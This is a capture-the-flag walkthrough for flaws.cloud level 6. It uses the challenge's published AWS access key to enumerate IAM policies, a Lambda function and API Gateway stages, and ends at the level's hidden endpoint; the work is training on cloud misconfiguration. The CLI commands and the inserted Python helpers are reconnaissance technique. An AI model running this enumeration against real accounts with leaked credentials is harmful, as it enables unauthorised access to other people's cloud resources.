Level 6 – Challenge statement:
For this final challenge, you’re getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account.
Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: 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
Background
flaws.cloud itself says it best:
Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS).
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.
A series of hints are provided that will teach you how to discover the info you'll need.
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level.
At the start of each level you'll learn how to avoid the problem the previous level exhibited.
Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud.
My approach:
This time we start with purportedly valid credentials, so we need to look for misconfigurations in the account that these credentials can reach.
First, let's load the credentials into an AWS CLI profile:
$ aws configure --profile flawslevel6
AWS Access Key ID [None]: AKIAJFQ6E7BY57Q3OBGA
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]:
The AWS documentation states the following about the SecurityAudit managed policy:
Security Auditor
AWS managed policy name: SecurityAudit
Use case: This user monitors accounts for compliance with security requirements. This user can access logs and events to investigate potential security breaches or potential malicious activity.
Policy description: This policy grants permissions to view configuration data for many AWS services and to review their logs.
Interesting. I noticed an S3 bucket called flaws-logs earlier; let's see:
aws s3 ls s3://flaws-logs --profile flawslevel6
An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied
Ok, not that easy.
Other AWS services that this policy likely covers are CloudTrail and CloudWatch, so let's try those:
aws cloudtrail describe-trails --profile flawslevel6
{
    "trailList": [
        {
            "IncludeGlobalServiceEvents": true,
            "Name": "cloudtrail",
            "S3KeyPrefix": "cloudtrail",
            "TrailARN": "arn:aws:cloudtrail:us-west-2:975426262029:trail/cloudtrail",
            "LogFileValidationEnabled": true,
            "IsMultiRegionTrail": true,
            "HasCustomEventSelectors": false,
            "S3BucketName": "flaws-logs",
            "HomeRegion": "us-west-2"
        }
    ]
}
Indeed, CloudTrail is on, with a trail named cloudtrail pushing files with the cloudtrail prefix to the flaws-logs bucket.
Let's see if we can list the CloudTrail events:
~$ aws cloudtrail lookup-events --profile flawslevel6
An error occurred (AccessDeniedException) when calling the LookupEvents operation: User: arn:aws:iam::975426262029:user/Level6 is not authorized to perform: cloudtrail:LookupEvents
Nope.
Let's learn more about this user:
$ aws --profile flawslevel6 iam get-user
{
    "User": {
        "UserName": "Level6",
        "Path": "/",
        "CreateDate": "2017-02-26T23:11:16Z",
        "UserId": "AIDAIRMDOSCWGLCDWOG6A",
        "Arn": "arn:aws:iam::975426262029:user/Level6"
    }
}
And their attached policies:
$ aws --profile flawslevel6 iam list-attached-user-policies --user-name Level6
{
    "AttachedPolicies": [
        {
            "PolicyName": "list_apigateways",
            "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
        },
        {
            "PolicyName": "SecurityAudit",
            "PolicyArn": "arn:aws:iam::aws:policy/SecurityAudit"
        }
    ]
}
Oh! This user also has the customer-managed list_apigateways policy attached.
Let's learn more about that policy:
aws --profile flawslevel6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
{
    "Policy": {
        "PolicyName": "list_apigateways",
        "Description": "List apigateways",
        "CreateDate": "2017-02-20T01:45:17Z",
        "AttachmentCount": 1,
        "IsAttachable": true,
        "PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
        "DefaultVersionId": "v4",
        "Path": "/",
        "Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
        "UpdateDate": "2017-02-20T01:48:17Z"
    }
}
Now that we have the ARN and the default version ID, we can get the meat of this policy, the policy document itself:
$ aws --profile flawslevel6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
{
    "PolicyVersion": {
        "CreateDate": "2017-02-20T01:48:17Z",
        "VersionId": "v4",
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Action": [
                        "apigateway:GET"
                    ],
                    "Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
                    "Effect": "Allow"
                }
            ]
        },
        "IsDefaultVersion": true
    }
}
Now we know that this user is allowed the action apigateway:GET on the resource arn:aws:apigateway:us-west-2::/restapis/*, i.e. read access to every REST API in us-west-2.
API Gateway is typically used in conjunction with Lambda functions, so let's see if there are any:
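To check, as an auditor would, exactly what that statement grants, here is an added example (my own code, not part of the original writeup) that evaluates the list_apigateways document against an action/resource pair using IAM's wildcard rules. It ignores Condition, NotAction and NotResource, which is an assumption for this example.

```python
import re

# Policy document returned by `iam get-policy-version` for list_apigateways (from the page).
LIST_APIGATEWAYS_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": ["apigateway:GET"],
            "Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
            "Effect": "Allow",
        }
    ],
}


def _as_list(value):
    """IAM lets Action and Resource be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _wildcard_match(pattern, candidate, ignore_case):
    """IAM wildcard matching: '*' matches any run of characters, '?' exactly one."""
    regex = "^" + re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".") + "$"
    return re.match(regex, candidate, re.IGNORECASE if ignore_case else 0) is not None


def is_allowed(policy, action, resource):
    """Simplified identity-policy evaluation: an explicit Deny wins, otherwise any
    matching Allow grants, otherwise implicit deny. Action names are case-insensitive,
    ARNs are not. Condition, NotAction and NotResource are ignored (assumption)."""
    allowed = False
    for stmt in policy.get("Statement", []):
        action_hit = any(_wildcard_match(a, action, True) for a in _as_list(stmt.get("Action")))
        resource_hit = any(_wildcard_match(r, resource, False) for r in _as_list(stmt.get("Resource")))
        if not (action_hit and resource_hit):
            continue
        if stmt.get("Effect") == "Deny":
            return False
        allowed = True
    return allowed


if __name__ == "__main__":
    # Stages of a REST API live under /restapis/<id>/stages, so `get-stages` is in scope,
    # while a write (POST) against the same API is not.
    print(is_allowed(LIST_APIGATEWAYS_POLICY, "apigateway:GET", "arn:aws:apigateway:us-west-2::/restapis/s33ppypa75/stages"))
    print(is_allowed(LIST_APIGATEWAYS_POLICY, "apigateway:POST", "arn:aws:apigateway:us-west-2::/restapis/s33ppypa75"))
```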
$ aws --region us-west-2 --profile flawslevel6 lambda list-functions
{
    "Functions": [
        {
            "TracingConfig": {
                "Mode": "PassThrough"
            },
            "Version": "$LATEST",
            "CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
            "FunctionName": "Level6",
            "MemorySize": 128,
            "CodeSize": 282,
            "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
            "Handler": "lambda_function.lambda_handler",
            "Role": "arn:aws:iam::975426262029:role/service-role/Level6",
            "Timeout": 3,
            "LastModified": "2017-02-27T00:24:36.054+0000",
            "Runtime": "python2.7",
            "Description": "A starter AWS Lambda function."
        }
    ]
}
There is one, called Level6. Let's look at its resource policy:
aws --region us-west-2 --profile flawslevel6 lambda get-policy --function-name Level6
{
    "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}"
}
Interesting info: API Gateway is allowed to invoke this function from arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6, and s33ppypa75 is a rest-api-id.
To get the full path we'll need the stage name (the "*" in that ARN):
aws --profile flawslevel6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
{
    "item": [
        {
            "stageName": "Prod",
            "cacheClusterEnabled": false,
            "cacheClusterStatus": "NOT_AVAILABLE",
            "deploymentId": "8gppiv",
            "lastUpdatedDate": 1488155168,
            "createdDate": 1488155168,
            "methodSettings": {}
        }
    ]
}
The stage name is Prod.
So we have all the pieces to complete the format: https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stage-name>/<lambda function>
Therefore, we can access the endpoint here: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
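The same derivation in code, as an added example that is my own and not part of the original writeup: it parses the escaped "Policy" string returned by `lambda get-policy` above, pulls the execute-api SourceArn out of the ArnLike condition, and expands a "*" stage with the stage names from `get-stages`. The last URL segment is the resource path from the SourceArn (here level6), which happens to match the function name. An auditor can run this across every function's resource policy to inventory which Lambdas are reachable through API Gateway.

```python
import json
import re

# Output of `lambda get-policy` for the Level6 function, as shown on the page;
# the "Policy" value is itself a JSON document encoded as a string.
GET_POLICY_OUTPUT = {
    "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}"
}

# execute-api ARN layout: arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<method>/<path>
EXECUTE_API_ARN = re.compile(
    r"^arn:aws:execute-api:(?P<region>[^:]+):(?P<account>[^:]*):"
    r"(?P<api_id>[^/]+)/(?P<stage>[^/]+)/(?P<method>[^/]+)/(?P<path>.*)$"
)


def api_gateway_sources(get_policy_output):
    """Return the parsed SourceArn of every Allow statement that lets the
    API Gateway service principal invoke the function."""
    document = json.loads(get_policy_output["Policy"])
    sources = []
    for stmt in document.get("Statement", []):
        principal = stmt.get("Principal", {})
        if stmt.get("Effect") != "Allow" or not isinstance(principal, dict):
            continue
        if principal.get("Service") != "apigateway.amazonaws.com":
            continue
        arn_like = stmt.get("Condition", {}).get("ArnLike", {})
        for key, arn in arn_like.items():
            match = EXECUTE_API_ARN.match(arn) if key.lower() == "aws:sourcearn" else None
            if match:
                sources.append(match.groupdict())
    return sources


def invoke_urls(get_policy_output, deployed_stages):
    """Build the invoke URL(s) for each source ARN. A '*' stage in the ARN is
    expanded with the stage names from `apigateway get-stages`; the HTTP method
    is not part of the URL, only the resource path is."""
    urls = []
    for src in api_gateway_sources(get_policy_output):
        stages = deployed_stages if src["stage"] == "*" else [src["stage"]]
        for stage in stages:
            urls.append(f"https://{src['api_id']}.execute-api.{src['region']}.amazonaws.com/{stage}/{src['path']}")
    return urls


if __name__ == "__main__":
    # "Prod" is the stageName returned by get-stages above.
    for url in invoke_urls(GET_POLICY_OUTPUT, ["Prod"]):
        print(url)
```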
Browsing there returns the following output:
"Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"
Done!
Level 6 complete.